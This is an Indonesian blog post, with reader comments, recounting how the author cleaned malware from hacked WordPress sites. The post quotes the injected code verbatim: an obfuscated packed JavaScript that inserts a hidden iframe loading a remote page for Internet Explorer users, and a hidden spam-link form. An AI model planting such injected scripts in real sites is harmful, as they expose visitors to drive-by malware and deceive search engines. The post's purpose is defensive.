Cara Mengatasi Website WordPress Yang Terkena Malware

Satu kata yang bisa saya katakan hari ini, akhirnya….

Kenapa?

Karena hampir 5 hari ini saya mumet mikirin website-website saya yang terkena hack, disusupi malware, diberi label ‘merah’ oleh google, dan dikomplain client (karena website ikut terkena label merah juga). Hehehe..

Tetapi sekarang semua sudah beres. Nggak tau lagi kalau besok.. mudah-mudahan nggak ada hacker iseng lagi.

Ceritanya begini, sewaktu akan mengakses website, muncul peringatan bahwa websiteku mengandung malware.

“Google has found malicious software may be installed onto your computer if you proceed. If you’ve visited this site in the past or you trust this site, it’s possible that it has just recently been compromised by a hacker. You should not proceed, and perhaps try again tomorrow or go somewhere else.”

website malware

Website Malware Klik Gambar Untuk Memperbesar

Huwaduh.. baru pertama kali nich, apa yang salah. Lalu saya coba menghubungi customer service hosting yang saya pakai, mereka tidak bisa berbuat banyak, hanya menyuruh saya menggunakan Google Webmaster Tools. Maka langkah-langkah untuk menyelesaikan masalah ini pun dimulai.

Kebanyakan hacker menyerang wordpress, jadi bagi yang mempunyai masalah sama mungkin pengalaman saya ini bisa membantu.

1. Sign Up ke Google Webmaster Tools untuk verifikasi websitemu. https://www.google.com/webmasters/tools/ Masukan URL websitemu, kemudian verifikasi melalui penambahan meta tag pada header atau upload file untuk mengidentifikasi bahwa website itu benar-benar tanggung jawabmu,

2. Gunakan fasilitas http://redleg-redleg.com/file-viewer/ untuk melihat isi halaman websitemu, apakah mengandung code-code yang berbahaya atau tidak. Untuk lebih jelasnya banyak-banyak baca blog http://redleg-redleg.blogspot.com

3. Script yang dideteksi sebagai malware oleh Google adalah

<sc ript>eval(function(p,a,c,k,e,d){e=function(c){return(c35?String.fromCharCode(c+29):c.toString(36))};if(!”.replace(/^/,String)){while(c–){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘i 9(){a=6.h(‘b’);7(!a){5 0=6.j(‘k’);6.g.l(0);0.n=’b’;0.4.d=’8′;0.4.c=’8′;0.4.e=’f’;0.m=’w://z.o.B/C.D?t=E’}}5 2=A.x.q();7(((2.3(“p”)!=-1&&2.3(“r”)==-1&&2.3(“s”)==-1))&&2.3(“v”)!=-1){5 t=u(“9()”,y)}’,41,41,’el||ua|indexOf|style|var|document|if|1px|MakeFrameEx|element|yahoo_api|height| width|display|none|body|getElementById|function|createElement|iframe|appendChild|src|id|nl|msie |toLowerCase|opera|webtv||setTimeout|windows|http|userAgent|1000|juyfdjhdjdgh|navigator|ai| showthread|php|72241732′.split(‘|’),0,{}))</sc ript>
 

Sedangkan script yang dideteksi oleh redleg adalah

<fo rm method=”post” action=”?” style=”overflow: auto; width: 5pt; height: 1pt; position: absolute; display: none “><A HREF=”http://businessactionf orafrica.org/?kids” TARGET=”_self”>kids clothes</A></fo rm>
 

Cara menghilangkan script malware tersebut

1. Hapus <? wp_head()?>; pada file header.php, biasanya sebelum </head>. Hal itu akan menghilangkan script Kids Clothes yang mengarah ke website businessactionofafrica.

Ada kendala pada saat menghapus wp_head, karena pada beberapa kasus, tampilan blog atau website wordpressmu akan kacau. Jika kamu bisa memperbaikinya, maka itu tidak menjadi masalah. Tetapi jika kamu kesulitan dan awam dalam hal coding, maka cara lain adalah install ulang wordpressmu.

2. Sebelum install ulang wordpress, kamu harus menghapus bersih file di public_html, hapus juga database dan username yang digunakan. Kalau kamu menggunakan fantastico pada saat dulu menginstall wordpress, maka kamu harus remove wordpress dari fantastico juga. Setelah selesai, tetap saja kamu harus menghapus bersih semua file yang ada di public_html. Oh ya, tetapi terlebih dahulu backup semua file penting dalam wordpress seperti database (gunakan PHP MyAdmin untuk import database menjadi .sql), kemudian download file di folder uploads, plugins dan themes. Di Zip dulu foldernya agar bisa didownload. Pada postingan berikutnya nanti saya akan berbagi cara backup wordpress dengan cepat.

3. Kunjungi kembali Google webmaster tools, klik pada keterangan malware dan centang tanda review untuk meminta Google mereview ulang websitemu dan menghilangkan ‘tanda merah’.

Untuk pencegahan dari hacker usil, ada baiknya kamu mencari informasi dari website lain lebih banyak. Karena saya tidak ahli dalam hal itu, buktinya dalam dua bulan ini sering kena hack, hehe.. Selamat mencoba dan semoga berhasil

You May Also Like..

11 Comments on Cara Mengatasi Website WordPress Yang Terkena Malware

  1. Dey Agusta
    29/12/2011 at 3:36 pm (5 years ago)

    Salam,
    Saya awam soal malware. Tapi karena Google memberi peringatan adanya malware saya jadi penasaran dan ketemu web Anda. Kalau bisa membantu, tolong tengoklah website saya di http://www.radiospfm.com mungkin Anda bisa menolong saya memberi jalan keluar menghilangkan peringatan google yang amat mengganggu itu. Kalau boleh dijawab via email saya. Terima kasih.

    Reply
  2. Restsindo - hty
    14/01/2012 at 10:59 am (5 years ago)

    Saya pada januari 2012 juga bernasib sama yaitu tiba tiba website saya ada tulisan peringatan dari google kalau website saya mengandung virus malware berbahaya.
    Jadi pusing nih.
    Terima kasih sedit banyak artikel anda sudah membatu kami.

    Reply
  3. nugi
    20/01/2012 at 1:56 pm (5 years ago)

    katanya wordpress mesti sering di upgrade ya buat cegah hack.
    itu situsnya gimana.. apa udah diupgrade tapi tetep kena..
    trims buat infonya.

    Reply
  4. blogle
    21/03/2012 at 1:16 am (5 years ago)

    makasih mas info nya sangat berguna sekali buat saya

    Reply
  5. bunga
    22/03/2012 at 8:37 pm (5 years ago)

    ternyata mumetnya poll kalo website kita kena malware, untung di sini ada solusinya

    Reply
  6. ardian
    23/03/2012 at 8:24 am (5 years ago)

    heheh,ia nih abis kena hack ya blognya..??
    punya bos saya juga ke blok sama malware itu,tapi masih mumet sama penjelasan agan..di bantu donk…

    Reply
  7. A.Salim
    07/07/2012 at 3:09 pm (4 years ago)

    Belajar masalah keamanan semoga tetap semangat ngeblog

    Reply
  8. suzan
    01/02/2013 at 11:52 pm (4 years ago)

    Gara” malware blog aku di suspen terus ma hostingnya….
    Need help…..ak ga ngerti coding….

    Reply
  9. Dikatama
    17/10/2014 at 1:14 pm (2 years ago)

    thanks infonya gan, sangat membantu sekali artikelnya, soalnya ane ngga mau lagi server ane jebol untuk kedua kalinya ….
    thanks

    Reply
  10. Malware Wordpress
    23/06/2015 at 5:38 am (1 year ago)

    wah.. ternyata ada cara yg lebih keren disini. kemaren ane nyobain sendiri permasalahan sesuai apa yang terdeteksi ma google web master, untung gak serumit permasalahan seperti di artikel ini 🙂 thank’s infonya bro, bs dipake jika ada web ane yg terserang seperti yang dijelaskan disini

    Reply

1Pingbacks & Trackbacks on Cara Mengatasi Website WordPress Yang Terkena Malware

  1. […] tertentu. Saya sangat bisa dalam maintenance website berbasis WordPress, terbukti dari seringnya website saya kena hack dan saya bisa mengatasinya. Mendesain website juga lumayan, walaupun tidak sebagus dan […]

Leave a Reply


*